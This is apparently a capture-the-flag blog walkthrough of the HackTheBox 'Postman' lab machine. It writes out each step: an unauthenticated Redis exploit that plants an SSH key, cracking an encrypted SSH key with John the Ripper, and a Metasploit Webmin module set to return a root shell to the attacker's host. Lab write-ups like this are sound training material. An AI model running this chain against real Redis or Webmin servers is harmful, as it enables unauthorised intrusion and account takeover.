HackTheBox: Postman

by Posted on
Image

This is an easy rated box so we won’t be going into crazy exploits here.

Host Enumeration

Naturally, we start with an Nmap scan. We see a couple of ports open:

  • 22: OpenSSH 7.6p1 Ubuntu
  • 80: Apache httpd 2.4.29
  • 6379: Redis key-value store
  • 10000: MiniServ 1.910 (Webmin httpd)
Nmap scan

Enumerating HTTP

The HTTP homepage has nothing too useful, it looks like a website that is under construction. The robots.txt page gave a 404, so I decided to move on and look at the other ports next.

HTTP landing page

Enumerating Redis

I’ve never seen the Redis port before, I have a suspicion that this could be the route forwards.

We know from our nmap scan that the redis service installed is version 4.0.9. Using searchsploit we can find a 4.X – 5.X unauthenticated remote code execution exploit. It seems to be a metasploit module (source), however I was not able to get this exploit to work successfully. So I turned to Google to find other exploit scripts. A GitHub repository has a python script which can be used to automatically exploit redis. However, first we must enumerate redis some more. In the code above we potentially see some information about the redis user, more specifically their username. 

$ redis-cli -h 10.10.10.169 config get dir 
1) "dir"
2) "/var/lib/redis"
Searchsploit redis

We can use the GitHub python script to launch the exploit, which places our id_rsa SSH public key on the target, allowing us to get a successful login as redis user. Interestingly, when running this exploit returned an error ERR Changing directory: Permission denied. The exploit seems to have worked regardless, which is a little strange. Note that I have since destroyed the keys used for during this exploit. 

$ python redis.py 10.10.10.160 redis

However, at this stage we do not yet have the user.txt flag. So we have some enumeration to do. To start off, I like to use the LinEnum.sh automated tool which performs mass host enumeration and gives information on potential misconfigurations.

After running the LinEnum.sh tool, we notice that there is an id_rsa backup file!

Transferring LinEnum.sh to the target
id_rsa.bak

In the image we can see by the permissions that the id_rsa.bak file belongs to the Matt user on this host. We’ll download the id_rsa.bak file to our localhost for some investigation

Download id_rsa.bak

Getting Matt Shell

The first thing that I try is to login to SSH as matt user using the id_rsa.bak as an identity file. However, I quickly find out that the file requires a passphrase; the key is encrypted! Using ssh2john.py, I can prepare the key to brute-force the passphrase locally using john the ripper. And it works! We identify that secret is computer2008.

$ python ssh2john.py id_rsa.bak > id_rsa_john
$ john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_john
      computer2008    (id_rsa.bak)
Using john

Strangely enough, I could not login using the SSH key and the computer2008 passphrase, however using the redis shell, I could pivot from redis to Matt using su matt and the cracked (computer2008) password. I presume that the relative public key has been removed from authorized_keys, and we cannot login using the private key.

Unable to login using identity key

Getting the Root

Ok so the next stage is a bit weird. Usually I like to enumerate with what I have in the user shell, however during the host enumeration phase we noticed Webmin (version 1.910) service hosted on port 10000. I have exploited Webmin before – albeit an earlier version – so I thought that perhaps this version also had vulnerabilities.

I decided to take a step back from my Matt shell and try to use the obtained credentials to exploit webmin. Using searchsploit, we see that there is a Metasploit module for Webmin 1.910 (source). First we must confirm that the obtained credentials (Matt:computer2008) authenticate us to Webmin. And they do!

Searchsploit find webmin vulnerability
Login to Webmin

We use the metasploit module exploit/linux/http/webmin_packageup_rce to exploit the vulnerability. We have to configure the options as set below. Setting SSL to TRUE is important; after all the Webmin application is running over SSL. This option is quickly forgotten though, so it is worth mentioning here. 

show options
set username Matt
set password computer2008
set ssl true 
set rhosts 10.10.10.160
set lhost 10.10.14.9
run

and we get a root shell!

Root proof

Published by Frosty

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.